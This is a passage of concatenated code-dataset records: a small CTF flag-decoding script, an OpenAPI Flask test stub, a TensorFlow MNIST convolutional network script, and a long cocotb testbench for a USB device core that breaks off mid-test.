written to: \")\n log.info(db_path)","sub_path":"nems_config/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":13495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"583787555","text":"# enc = ''.join([chr((ord(flag[i]) << 8) + ord(flag[i + 1])) for i in range(0, len(flag), 2)])\n\nwith open(\"enc\", \"r\") as f:\n enc = f.read()\n\nenc_lenght = len(enc)\n\nprint(f\"Encrypted: {enc}\")\nprint(f\"Enc lenght: {enc_lenght}\")\n\nflag = \"\"\nfor i in range(len(enc)):\n firstchar = chr(ord(enc[i]) >> 8)\n secondchar = chr((ord(enc[i]) - (ord(firstchar) << 8)))\n\n flag += firstchar\n flag += secondchar\n\nprint(f\"Flag: {flag}\")","sub_path":"Reverse Engineering/Transformation/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"645761360","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nimport unittest\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom openapi_server.models.sample_body import SampleBody # noqa: E501\nfrom openapi_server.models.sample_response import SampleResponse # noqa: E501\nfrom openapi_server.test import BaseTestCase\n\n\nclass TestDefaultController(BaseTestCase):\n \"\"\"DefaultController integration test stubs\"\"\"\n\n def test_sample_datasource(self):\n \"\"\"Test case for sample_datasource\n\n Выполняет предварительный анализ данных на куске файла\n \"\"\"\n sample_body = {\n \"file\" : \"file\",\n \"delimiter\" : \"delimiter\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/sample',\n method='POST',\n headers=headers,\n data=json.dumps(sample_body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"openapi_server/test/test_default_controller.py","file_name":"test_default_controller.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542062797","text":"import tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../tmp/data/\", one_hot=True)\n\nlearning_rate = 0.01\nepochs = 100\nbatch_size = 10\ndisplay_step = 10\n\nno_of_inputs = 784 # no of input pixels\nno_of_outputs = 10 # no of outputs\ndrop_out = 0.75 # keep probability\n\ninput_data = tf.placeholder(tf.float32, [None, 784], name='Input')\noutput_data = tf.placeholder(tf.float32, [None, 10], name='Output')\nkeep_prob = tf.placeholder(tf.float32)\n\nweights = {\n 'weight1': tf.Variable(tf.random_normal([5, 5, 1, 32])), # for 1st Conv layer C5-32\n 'weight2': tf.Variable(tf.random_normal([5, 5, 32, 64])), # for 2nd Conv layer C5-64\n 'weight3': tf.Variable(tf.random_normal([7 * 7 * 64, 1024])), # for fully connected layer\n 'weight4': tf.Variable(tf.random_normal([1024, no_of_outputs])) # for output layer\n}\n\nbias = {\n 'bias1': tf.Variable(tf.random_normal([32])),\n 'bias2': tf.Variable(tf.random_normal([64])),\n 'bias3': tf.Variable(tf.random_normal([1024])),\n 'bias4': tf.Variable(tf.random_normal([no_of_outputs]))\n}\n\n\ndef conv(x, W, b, strides=1):\n # Conv wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n\ndef find_maxpool(x, k=2):\n # MaxPool wrapper\n max_pool = tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1], padding='SAME')\n return max_pool\n\n\ndef conv_layer(x, weights, bias, drop_out):\n x = tf.reshape(x, shape=[-1, 28, 28, 1])\n\n # First Convolution Layer\n conv1 = conv(x, weights['weight1'], bias['bias1'])\n # Max Pooling\n conv1 = find_maxpool(conv1, k=2)\n\n # Second Convolution Layer\n conv2 = conv(conv1, weights['weight2'], bias['bias2'])\n # Max Pooling\n conv2 = find_maxpool(conv2, k=2)\n\n # Fully connected layer\n # Reshape conv2 output to fit fully connected layer input\n fc1 = tf.reshape(conv2, [-1, weights['weight3'].get_shape().as_list()[0]])\n fc1 = tf.add(tf.matmul(fc1, weights['weight3']), bias['bias3'])\n fc1 = tf.nn.relu(fc1)\n # Apply Dropout\n fc1 = tf.nn.dropout(fc1, drop_out)\n\n # Output, class prediction\n output = tf.add(tf.matmul(fc1, weights['weight4']), bias['bias4'])\n return output\n\n\npred = conv_layer(input_data, weights, bias, keep_prob)\n\n# Define loss and optimizer\n# cost = tf.reduce_sum(tf.pow(pred - output_data, 2)) / 2\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, output_data))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(output_data, 1))\naccuracy = tf.mul(100.0, tf.reduce_mean(tf.cast(correct_pred, tf.float32)))\n\n# Initializing the variables\ninit = tf.initialize_all_variables()\n\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n step = 1\n # Keep training until reach max iterations\n for epoch in range(epochs):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n sess.run(optimizer, feed_dict={input_data: batch_x, output_data: batch_y,\n keep_prob: drop_out})\n if epoch % display_step == 0:\n # Calculate batch loss and accuracy\n loss, acc = sess.run([cost, accuracy], feed_dict={input_data: batch_x,\n output_data: batch_y,\n keep_prob: 1.})\n print(\"Iter \", epoch, \" Mini batch Loss= \", \"{:.3f}\".format(\n loss) + \", Training Accuracy= \", \"{:.3f}\".format(acc))\n step += 1\n print(\"Optimization Finished!\")\n print(\"Total test data length: \", len(mnist.test.images))\n print(\"Testing Accuracy :\", sess.run(accuracy, feed_dict={input_data: mnist.test.images[:],\n output_data: mnist.test.labels[:],\n keep_prob: 1.}))\n","sub_path":"models/simple_ccn_for_MNIST.py","file_name":"simple_ccn_for_MNIST.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640578501","text":"# Tests for the Fomu Tri-Endpoint\nimport cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import RisingEdge, NullTrigger, Timer\nfrom cocotb.result import TestFailure, TestSuccess, ReturnValue\n\nfrom valentyusb.usbcore.utils.packet import *\nfrom valentyusb.usbcore.endpoint import *\nfrom valentyusb.usbcore.pid import *\nfrom valentyusb.usbcore.utils.pprint import pp_packet\n\nfrom wishbone import WishboneMaster, WBOp\n\nimport logging\nimport csv\n\ndef grouper_tofit(n, iterable):\n from itertools import zip_longest\n \"\"\"Group iterable into multiples of n, except don't leave\n trailing None values at the end.\n \"\"\"\n # itertools.zip_longest is broken because it requires you to fill in some\n # value, and doesn't mention anything else in its documentation that would\n # not require this behavior.\n # Re-do the array to shrink it down if any None values are discovered.\n broken = zip_longest(*[iter(iterable)]*n, fillvalue=None)\n fixed = []\n for e in broken:\n f = []\n for el in e:\n if el is not None:\n f.append(el)\n fixed.append(f)\n return fixed\n\nclass UsbTest:\n def __init__(self, dut):\n self.dut = dut\n self.csrs = dict()\n with open(\"csr.csv\", newline='') as csr_csv_file:\n csr_csv = csv.reader(csr_csv_file)\n # csr_register format: csr_register, name, address, size, rw/ro\n for row in csr_csv:\n if row[0] == 'csr_register':\n self.csrs[row[1]] = int(row[2], base=0)\n cocotb.fork(Clock(dut.clk48, 20800, 'ps').start())\n self.wb = WishboneMaster(dut, \"wishbone\", dut.clk12, timeout=20)\n\n # Set the signal \"test_name\" to match this test\n import inspect\n tn = cocotb.binary.BinaryValue(value=None, n_bits=4096)\n tn.buff = inspect.stack()[1][3]\n self.dut.test_name = tn\n\n @cocotb.coroutine\n def reset(self):\n\n self.dut.reset = 1\n yield RisingEdge(self.dut.clk12)\n self.dut.reset = 0\n yield RisingEdge(self.dut.clk12)\n\n self.dut.usb_d_p = 1\n self.dut.usb_d_n = 0\n\n yield self.disconnect()\n\n # Enable endpoint 0\n yield self.write(self.csrs['usb_enable_out0'], 0xff)\n yield self.write(self.csrs['usb_enable_out1'], 0xff)\n yield self.write(self.csrs['usb_enable_in0'], 0xff)\n yield self.write(self.csrs['usb_enable_in1'], 0xff)\n\n @cocotb.coroutine\n def write(self, addr, val):\n yield self.wb.write(addr, val)\n\n @cocotb.coroutine\n def read(self, addr):\n value = yield self.wb.read(addr)\n raise ReturnValue(value)\n\n @cocotb.coroutine\n def connect(self):\n USB_PULLUP_OUT = self.csrs['usb_pullup_out']\n yield self.write(USB_PULLUP_OUT, 1)\n\n @cocotb.coroutine\n def clear_pending(self, _ep):\n yield Timer(0)\n\n @cocotb.coroutine\n def disconnect(self):\n USB_PULLUP_OUT = self.csrs['usb_pullup_out']\n yield self.write(USB_PULLUP_OUT, 0)\n\n def assertEqual(self, a, b, msg):\n if a != b:\n raise TestFailure(\"{} != {} - {}\".format(a, b, msg))\n\n def assertSequenceEqual(self, a, b, msg):\n if a != b:\n raise TestFailure(\"{} vs {} - {}\".format(a, b, msg))\n\n def print_ep(self, epaddr, msg, *args):\n self.dut._log.info(\"ep(%i, %s): %s\" % (\n EndpointType.epnum(epaddr),\n EndpointType.epdir(epaddr).name,\n msg) % args)\n\n # Host->Device\n @cocotb.coroutine\n def _host_send_packet(self, packet):\n \"\"\"Send a USB packet.\"\"\"\n\n # Packet gets multiplied by 4x so we can send using the\n # usb48 clock instead of the usb12 clock.\n packet = 'JJJJJJJJ' + wrap_packet(packet)\n self.assertEqual('J', packet[-1], \"Packet didn't end in J: \"+packet)\n\n for v in packet:\n if v == '0' or v == '_':\n # SE0 - both lines pulled low\n self.dut.usb_d_p <= 0\n self.dut.usb_d_n <= 0\n elif v == '1':\n # SE1 - illegal, should never occur\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 1\n elif v == '-' or v == 'I':\n # Idle\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 0\n elif v == 'J':\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 0\n elif v == 'K':\n self.dut.usb_d_p <= 0\n self.dut.usb_d_n <= 1\n else:\n raise TestFailure(\"Unknown value: %s\" % v)\n yield RisingEdge(self.dut.clk48)\n\n @cocotb.coroutine\n def host_send_token_packet(self, pid, addr, ep):\n epnum = EndpointType.epnum(ep)\n yield self._host_send_packet(token_packet(pid, addr, epnum))\n\n @cocotb.coroutine\n def host_send_data_packet(self, pid, data):\n assert pid in (PID.DATA0, PID.DATA1), pid\n yield self._host_send_packet(data_packet(pid, data))\n\n @cocotb.coroutine\n def host_send_sof(self, time):\n yield self._host_send_packet(sof_packet(time))\n\n @cocotb.coroutine\n def host_send_ack(self):\n yield self._host_send_packet(handshake_packet(PID.ACK))\n\n @cocotb.coroutine\n def host_send(self, data01, addr, epnum, data, expected=PID.ACK):\n \"\"\"Send data out the virtual USB connection, including an OUT token\"\"\"\n yield self.host_send_token_packet(PID.OUT, addr, epnum)\n yield self.host_send_data_packet(data01, data)\n yield self.host_expect_packet(handshake_packet(expected), \"Expected {} packet.\".format(expected))\n\n\n @cocotb.coroutine\n def host_setup(self, addr, epnum, data):\n \"\"\"Send data out the virtual USB connection, including a SETUP token\"\"\"\n yield self.host_send_token_packet(PID.SETUP, addr, epnum)\n yield self.host_send_data_packet(PID.DATA0, data)\n yield self.host_expect_ack()\n\n @cocotb.coroutine\n def host_recv(self, data01, addr, epnum, data):\n \"\"\"Send data out the virtual USB connection, including an IN token\"\"\"\n yield self.host_send_token_packet(PID.IN, addr, epnum)\n yield self.host_expect_data_packet(data01, data)\n yield self.host_send_ack()\n\n # Device->Host\n @cocotb.coroutine\n def host_expect_packet(self, packet, msg=None):\n \"\"\"Except to receive the following USB packet.\"\"\"\n\n def current():\n values = (self.dut.usb_d_p, self.dut.usb_d_n)\n\n if values == (0, 0):\n return '_'\n elif values == (1, 1):\n return '1'\n elif values == (1, 0):\n return 'J'\n elif values == (0, 1):\n return 'K'\n else:\n raise TestFailure(\"Unrecognized dut values: {}\".format(values))\n\n # Wait for transmission to start\n tx = 0\n bit_times = 0\n for i in range(0, 100):\n tx = self.dut.usb_tx_en\n if tx == 1:\n break\n yield RisingEdge(self.dut.clk48)\n bit_times = bit_times + 1\n if tx != 1:\n raise TestFailure(\"No packet started, \" + msg)\n\n # # USB specifies that the turn-around time is 7.5 bit times for the device\n bit_time_max = 12.5\n bit_time_acceptable = 7.5\n if (bit_times/4.0) > bit_time_max:\n raise TestFailure(\"Response came after {} bit times, which is more than {}\".format(bit_times / 4.0, bit_time_max))\n if (bit_times/4.0) > bit_time_acceptable:\n self.dut._log.warn(\"Response came after {} bit times (> {})\".format(bit_times / 4.0, bit_time_acceptable))\n else:\n self.dut._log.info(\"Response came after {} bit times\".format(bit_times / 4.0))\n\n # Read in the transmission data\n result = \"\"\n for i in range(0, 1024):\n result += current()\n yield RisingEdge(self.dut.clk48)\n if self.dut.usb_tx_en != 1:\n break\n if tx == 1:\n raise TestFailure(\"Packet didn't finish, \" + msg)\n self.dut.usb_d_p = 1\n self.dut.usb_d_n = 0\n\n # Check the packet received matches\n expected = pp_packet(wrap_packet(packet))\n actual = pp_packet(result)\n self.assertSequenceEqual(expected, actual, msg)\n\n @cocotb.coroutine\n def host_expect_ack(self):\n yield self.host_expect_packet(handshake_packet(PID.ACK), \"Expected ACK packet.\")\n\n @cocotb.coroutine\n def host_expect_nak(self):\n yield self.host_expect_packet(handshake_packet(PID.NAK), \"Expected NAK packet.\")\n\n @cocotb.coroutine\n def host_expect_stall(self):\n yield self.host_expect_packet(handshake_packet(PID.STALL), \"Expected STALL packet.\")\n\n @cocotb.coroutine\n def host_expect_data_packet(self, pid, data):\n assert pid in (PID.DATA0, PID.DATA1), pid\n yield self.host_expect_packet(data_packet(pid, data), \"Expected %s packet with %r\" % (pid.name, data))\n\n @cocotb.coroutine\n def pending(self, ep):\n if EndpointType.epdir(ep) == EndpointType.IN:\n val = yield self.read(self.csrs['usb_epin_status'])\n else:\n val = yield self.read(self.csrs['usb_epout_status'])\n raise ReturnValue(val & 1)\n\n @cocotb.coroutine\n def expect_setup(self, epaddr, expected_data):\n actual_data = []\n # wait for data to appear\n for i in range(128):\n self.dut._log.debug(\"Prime loop {}\".format(i))\n status = yield self.read(self.csrs['usb_setup_status'])\n have = status & 1\n if have:\n break\n yield RisingEdge(self.dut.clk12)\n\n for i in range(48):\n self.dut._log.debug(\"Read loop {}\".format(i))\n status = yield self.read(self.csrs['usb_setup_status'])\n have = status & 1\n if not have:\n break\n v = yield self.read(self.csrs['usb_setup_data'])\n yield self.write(self.csrs['usb_setup_ctrl'], 1)\n actual_data.append(v)\n yield RisingEdge(self.dut.clk12)\n\n if len(actual_data) < 2:\n raise TestFailure(\"data was short (got {}, expected {})\".format(expected_data, actual_data))\n actual_data, actual_crc16 = actual_data[:-2], actual_data[-2:]\n\n self.print_ep(epaddr, \"Got: %r (expected: %r)\", actual_data, expected_data)\n self.assertSequenceEqual(expected_data, actual_data, \"SETUP packet not received\")\n self.assertSequenceEqual(crc16(expected_data), actual_crc16, \"CRC16 not valid\")\n\n @cocotb.coroutine\n def expect_data(self, epaddr, expected_data, expected):\n actual_data = []\n # wait for data to appear\n for i in range(128):\n self.dut._log.debug(\"Prime loop {}\".format(i))\n status = yield self.read(self.csrs['usb_epout_status'])\n have = status & 1\n if have:\n break\n yield RisingEdge(self.dut.clk12)\n\n for i in range(256):\n self.dut._log.debug(\"Read loop {}\".format(i))\n status = yield self.read(self.csrs['usb_epout_status'])\n have = status & 1\n if not have:\n break\n v = yield self.read(self.csrs['usb_epout_data'])\n yield self.write(self.csrs['usb_epout_ctrl'], 3)\n actual_data.append(v)\n yield RisingEdge(self.dut.clk12)\n\n if expected == PID.ACK:\n if len(actual_data) < 2:\n raise TestFailure(\"data {} was short\".format(actual_data))\n actual_data, actual_crc16 = actual_data[:-2], actual_data[-2:]\n\n self.print_ep(epaddr, \"Got: %r (expected: %r)\", actual_data, expected_data)\n self.assertSequenceEqual(expected_data, actual_data, \"DATA packet not correctly received\")\n self.assertSequenceEqual(crc16(expected_data), actual_crc16, \"CRC16 not valid\")\n\n @cocotb.coroutine\n def set_response(self, ep, response):\n if EndpointType.epdir(ep) == EndpointType.IN and response == EndpointResponse.ACK:\n yield self.write(self.csrs['usb_epin_epno'], EndpointType.epnum(ep))\n\n @cocotb.coroutine\n def send_data(self, token, ep, data):\n for b in data:\n yield self.write(self.csrs['usb_epin_data'], b)\n yield self.write(self.csrs['usb_epin_epno'], ep)\n\n @cocotb.coroutine\n def transaction_setup(self, addr, data, epnum=0):\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n xmit = cocotb.fork(self.host_setup(addr, epnum, data))\n yield self.expect_setup(epaddr_out, data)\n yield xmit.join()\n\n @cocotb.coroutine\n def transaction_data_out(self, addr, ep, data, chunk_size=64, expected=PID.ACK):\n epnum = EndpointType.epnum(ep)\n datax = PID.DATA1\n\n # # Set it up so we ACK the final IN packet\n # yield self.write(self.csrs['usb_epin_epno'], 0)\n for _i, chunk in enumerate(grouper_tofit(chunk_size, data)):\n self.dut._log.warning(\"Sening {} bytes to host\".format(len(chunk)))\n # Enable receiving data\n yield self.write(self.csrs['usb_epout_ctrl'], (1 << 1))\n xmit = cocotb.fork(self.host_send(datax, addr, epnum, chunk, expected))\n yield self.expect_data(epnum, list(chunk), expected)\n yield xmit.join()\n\n if datax == PID.DATA0:\n datax = PID.DATA1\n else:\n datax = PID.DATA0\n\n @cocotb.coroutine\n def transaction_data_in(self, addr, ep, data, chunk_size=64):\n epnum = EndpointType.epnum(ep)\n datax = PID.DATA1\n sent_data = 0\n for i, chunk in enumerate(grouper_tofit(chunk_size, data)):\n sent_data = 1\n self.dut._log.debug(\"Actual data we're expecting: {}\".format(chunk))\n for b in chunk:\n yield self.write(self.csrs['usb_epin_data'], b)\n yield self.write(self.csrs['usb_epin_epno'], epnum)\n recv = cocotb.fork(self.host_recv(datax, addr, epnum, chunk))\n yield recv.join()\n\n if datax == PID.DATA0:\n datax = PID.DATA1\n else:\n datax = PID.DATA0\n if not sent_data:\n yield self.write(self.csrs['usb_epin_epno'], epnum)\n recv = cocotb.fork(self.host_recv(datax, addr, epnum, []))\n yield self.send_data(datax, epnum, data)\n yield recv.join()\n\n @cocotb.coroutine\n def set_data(self, ep, data):\n _epnum = EndpointType.epnum(ep)\n for b in data:\n yield self.write(self.csrs['usb_epin_data'], b)\n\n @cocotb.coroutine\n def transaction_status_in(self, addr, ep):\n epnum = EndpointType.epnum(ep)\n assert EndpointType.epdir(ep) == EndpointType.IN\n xmit = cocotb.fork(self.host_recv(PID.DATA1, addr, epnum, []))\n yield xmit.join()\n\n @cocotb.coroutine\n def transaction_status_out(self, addr, ep):\n epnum = EndpointType.epnum(ep)\n assert EndpointType.epdir(ep) == EndpointType.OUT\n xmit = cocotb.fork(self.host_send(PID.DATA1, addr, epnum, []))\n yield xmit.join()\n\n @cocotb.coroutine\n def control_transfer_out(self, addr, setup_data, descriptor_data=None):\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n if (setup_data[0] & 0x80) == 0x80:\n raise Exception(\"setup_data indicated an IN transfer, but you requested an OUT transfer\")\n\n # Setup stage\n self.dut._log.info(\"setup stage\")\n yield self.transaction_setup(addr, setup_data)\n\n # Data stage\n if (setup_data[7] != 0 or setup_data[6] != 0) and descriptor_data is None:\n raise Exception(\"setup_data indicates data, but no descriptor data was specified\")\n if (setup_data[7] == 0 and setup_data[6] == 0) and descriptor_data is not None:\n raise Exception(\"setup_data indicates no data, but descriptor data was specified\")\n if descriptor_data is not None:\n self.dut._log.info(\"data stage\")\n yield self.transaction_data_out(addr, epaddr_out, descriptor_data)\n\n # Status stage\n self.dut._log.info(\"status stage\")\n # yield self.set_response(epaddr_in, EndpointResponse.ACK)\n yield self.transaction_status_in(addr, epaddr_in)\n\n @cocotb.coroutine\n def control_transfer_in(self, addr, setup_data, descriptor_data=None):\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n if (setup_data[0] & 0x80) == 0x00:\n raise Exception(\"setup_data indicated an OUT transfer, but you requested an IN transfer\")\n\n # Setup stage\n self.dut._log.info(\"setup stage\")\n yield self.transaction_setup(addr, setup_data)\n\n # Data stage\n # Data stage\n if (setup_data[7] != 0 or setup_data[6] != 0) and descriptor_data is None:\n raise Exception(\"setup_data indicates data, but no descriptor data was specified\")\n if (setup_data[7] == 0 and setup_data[6] == 0) and descriptor_data is not None:\n raise Exception(\"setup_data indicates no data, but descriptor data was specified\")\n if descriptor_data is not None:\n self.dut._log.info(\"data stage\")\n yield self.transaction_data_in(addr, epaddr_in, descriptor_data)\n\n # Status stage\n self.dut._log.info(\"status stage\")\n # yield self.set_response(epaddr_in, EndpointResponse.ACK)\n yield self.transaction_status_out(addr, epaddr_out)\n\n@cocotb.test()\ndef iobuf_validate(dut):\n \"\"\"Sanity test that the Wishbone bus actually works\"\"\"\n harness = UsbTest(dut)\n yield harness.reset()\n\n USB_PULLUP_OUT = harness.csrs['usb_pullup_out']\n val = yield harness.read(USB_PULLUP_OUT)\n dut._log.info(\"Value at start: {}\".format(val))\n if dut.usb_pullup != 0:\n raise TestFailure(\"USB pullup didn't start at zero\")\n\n yield harness.write(USB_PULLUP_OUT, 1)\n\n val = yield harness.read(USB_PULLUP_OUT)\n dut._log.info(\"Memory value: {}\".format(val))\n if val != 1:\n raise TestFailure(\"USB pullup is not set!\")\n raise TestSuccess(\"iobuf validated\")\n\n@cocotb.test()\ndef test_control_setup(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n # 012345 0123\n # 0b011100 0b1000\n yield harness.write(harness.csrs['usb_address'], 28)\n yield harness.transaction_setup(28, [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00])\n yield harness.transaction_data_in(28, 0, [])\n\n@cocotb.test()\ndef test_control_transfer_in(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n\n yield harness.connect()\n yield harness.write(harness.csrs['usb_address'], 20)\n yield harness.control_transfer_in(\n 20,\n # Get descriptor, Index 0, Type 03, LangId 0000, wLength 10?\n [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00],\n # 12 byte descriptor, max packet size 8 bytes\n [0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n 0x08, 0x09, 0x0A, 0x0B],\n )\n\n@cocotb.test()\ndef test_sof_stuffing(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n\n yield harness.connect()\n yield harness.host_send_sof(0x04ff)\n yield harness.host_send_sof(0x0512)\n yield harness.host_send_sof(0x06e1)\n yield harness.host_send_sof(0x0519)\n\n@cocotb.test()\ndef test_sof_is_ignored(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 0x20\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n data = [0, 1, 8, 0, 4, 3, 0, 0]\n @cocotb.coroutine\n def send_setup_and_sof():\n # Send SOF packet\n yield harness.host_send_sof(2)\n\n # Setup stage\n # ------------------------------------------\n # Send SETUP packet\n yield harness.host_send_token_packet(PID.SETUP, addr, EndpointType.epnum(epaddr_out))\n\n # Send another SOF packet\n yield harness.host_send_sof(3)\n\n # Data stage\n # ------------------------------------------\n # Send DATA packet\n yield harness.host_send_data_packet(PID.DATA1, data)\n yield harness.host_expect_ack()\n\n # Send another SOF packet\n yield harness.host_send_sof(4)\n\n # Indicate that we're ready to receive data to EP0\n # harness.write(harness.csrs['usb_epin_epno'], 0)\n\n xmit = cocotb.fork(send_setup_and_sof())\n yield harness.expect_setup(epaddr_out, data)\n yield xmit.join()\n\n # # Status stage\n # # ------------------------------------------\n yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n yield harness.transaction_status_out(addr, epaddr_out)\n\n@cocotb.test()\ndef test_control_setup_clears_stall(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0, 0]\n\n # Send the data -- just to ensure that things are working\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n # Send it again to ensure we can re-queue things.\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n # STALL the endpoint now\n yield harness.write(harness.csrs['usb_enable_out0'], 0)\n yield harness.write(harness.csrs['usb_enable_out1'], 0)\n yield harness.write(harness.csrs['usb_enable_in0'], 0)\n yield harness.write(harness.csrs['usb_enable_in1'], 0)\n\n # Do another receive, which should fail\n yield harness.transaction_data_out(addr, epaddr_out, d, expected=PID.STALL)\n\n # Do a SETUP, which should pass\n yield harness.write(harness.csrs['usb_enable_out0'], 1)\n yield harness.control_transfer_out(addr, d)\n\n # Finally, do one last transfer, which should succeed now\n # that the endpoint is unstalled.\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n@cocotb.test()\ndef test_control_transfer_in_nak_data(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 22\n yield harness.write(harness.csrs['usb_address'], addr)\n # Get descriptor, Index 0, Type 03, LangId 0000, wLength 64\n setup_data = [0x80, 0x06, 0x00, 0x03, 0x00, 0x00, 0x40, 0x00]\n in_data = [0x04, 0x03, 0x09, 0x04]\n\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n # yield harness.clear_pending(epaddr_in)\n\n yield harness.write(harness.csrs['usb_address'], addr)\n\n # Setup stage\n # -----------\n yield harness.transaction_setup(addr, setup_data)\n\n # Data stage\n # -----------\n yield harness.set_response(epaddr_in, EndpointResponse.NAK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_nak()\n\n yield harness.set_data(epaddr_in, in_data)\n yield harness.set_response(epaddr_in, EndpointResponse.ACK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_data_packet(PID.DATA1, in_data)\n yield harness.host_send_ack()\n\n# @cocotb.test()\n# def test_control_transfer_in_nak_status(dut):\n# harness = UsbTest(dut)\n# yield harness.reset()\n# yield harness.connect()\n\n# addr = 20\n# setup_data = [0x00, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00]\n# out_data = [0x00, 0x01]\n\n# epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n# epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n# yield harness.clear_pending(epaddr_out)\n# yield harness.clear_pending(epaddr_in)\n\n# # Setup stage\n# # -----------\n# yield harness.transaction_setup(addr, setup_data)\n\n# # Data stage\n# # ----------\n# yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n# yield harness.transaction_data_out(addr, epaddr_out, out_data)\n\n# # Status stage\n# # ----------\n# yield harness.set_response(epaddr_in, EndpointResponse.NAK)\n\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_nak()\n\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_nak()\n\n# yield harness.set_response(epaddr_in, EndpointResponse.ACK)\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_data_packet(PID.DATA1, [])\n# yield harness.host_send_ack()\n# yield harness.clear_pending(epaddr_in)\n\n\n@cocotb.test()\ndef test_control_transfer_in(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.OUT))\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.IN))\n yield harness.write(harness.csrs['usb_address'], 20)\n\n yield harness.control_transfer_in(\n 20,\n # Get descriptor, Index 0, Type 03, LangId 0000, wLength 10?\n [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00],\n # 12 byte descriptor, max packet size 8 bytes\n [0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n 0x08, 0x09, 0x0A, 0x0B],\n )\n\n@cocotb.test()\ndef test_control_transfer_in_out(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.OUT))\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.IN))\n yield harness.write(harness.csrs['usb_address'], 20)\n\n yield harness.control_transfer_in(\n 20,\n # Get device descriptor\n [0x80, 0x06, 0x00, 0x01, 0x00, 0x00, 0x40, 00],\n # 18 byte descriptor, max packet size 8 bytes\n [0x12, 0x01, 0x10, 0x02, 0x02, 0x00, 0x00, 0x40,\n 0x09, 0x12, 0xB1, 0x70, 0x01, 0x01, 0x01, 0x02,\n 00, 0x01],\n )\n\n yield harness.control_transfer_out(\n 20,\n # Set address (to 11)\n [0x00, 0x05, 0x0B, 0x00, 0x00, 0x00, 0x00, 0x00],\n # 18 byte descriptor, max packet size 8 bytes\n None,\n )\n\n# @cocotb.test()\n# def test_control_transfer_out_nak_data(dut):\n# harness = UsbTest(dut)\n# yield harness.reset()\n# yield harness.connect()\n\n# addr = 20\n# setup_data = [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 